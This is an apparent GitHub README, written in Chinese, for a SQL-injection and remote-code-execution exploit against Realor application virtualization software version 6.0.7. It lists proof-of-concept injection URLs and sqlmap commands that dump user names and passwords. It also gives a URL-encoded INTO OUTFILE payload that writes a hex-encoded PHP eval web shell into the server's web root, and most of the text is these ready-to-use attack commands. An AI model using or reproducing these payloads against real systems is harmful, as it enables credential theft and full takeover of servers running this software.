└── README.md
/README.md:
--------------------------------------------------------------------------------
1 | # realor-sql-Injection-exp
2 | 瑞友天翼应用虚拟化-远程代码执行/sql注入,realor-sql-Injection
3 |
4 | ### 前言
5 | 共有三个注入点,其实看了源码发现只要没加过滤函数的基本都有注入;即便加了过滤函数(过滤的很少),能否bypass后续也可以研究
6 |
7 | ### POC
8 | poc1:
9 | ```
10 | http://url/AgentBoard.XGI?user='||'1&cmd=UserLogin
11 | ```
12 | poc2:
13 | ```
14 | /ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_1'__pwd_1__serverIdStr_1&sign=98917d27eda97794c471d1692a019182
15 | ```
16 | poc3:
17 | GetBSAppUrl
18 |
19 | ### EXP
20 | exp1:
21 | ```
22 | sqlmap -u 'http://url/AgentBoard.XGI?user='||'1' -D CASSystemDS -T CUser -C name,pwd --dump
23 | sqlmap -u "" --file-write "/root/shell/shell-php/biaozun.php" --file-dest "C:\RealFriend\Rap Server\WebRoot\3.php"
24 | #或者手动
25 | http://172.16.1.200:8081/AgentBoard.XGI?user=%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27C%3A%2FRealFriend%2FRap%20Server%2FWebRoot%2F3.php%27%20LINES%20TERMINATED%20BY%200x3c3f70687020406576616c28245f504f53545b22636d64225d293f3e--%20-&cmd=UserLogin
26 | #需要修改绝对路径,内容是16进制,
27 | ```
28 |
29 | 上述用**绝对路径**不是最通用写shell方法,不细说了。
30 |
31 | ### 漏洞细节
32 | 复现环境:版本:6.0.7
33 | 查看版本:
34 | ```
35 | /About.XGI
36 | /CASMain.XGI?cmd=About
37 | ```
38 | zend52解密xgi:http://dezend.qiling.org/free/
39 | 
40 |
41 | 漏洞点:
42 | 
43 |
44 | 登陆处是有过滤的,这里没有用过滤函数造成注入。
45 | 
46 |
47 | getshell直接sqlmap或者手动
48 |
49 |
50 |
--------------------------------------------------------------------------------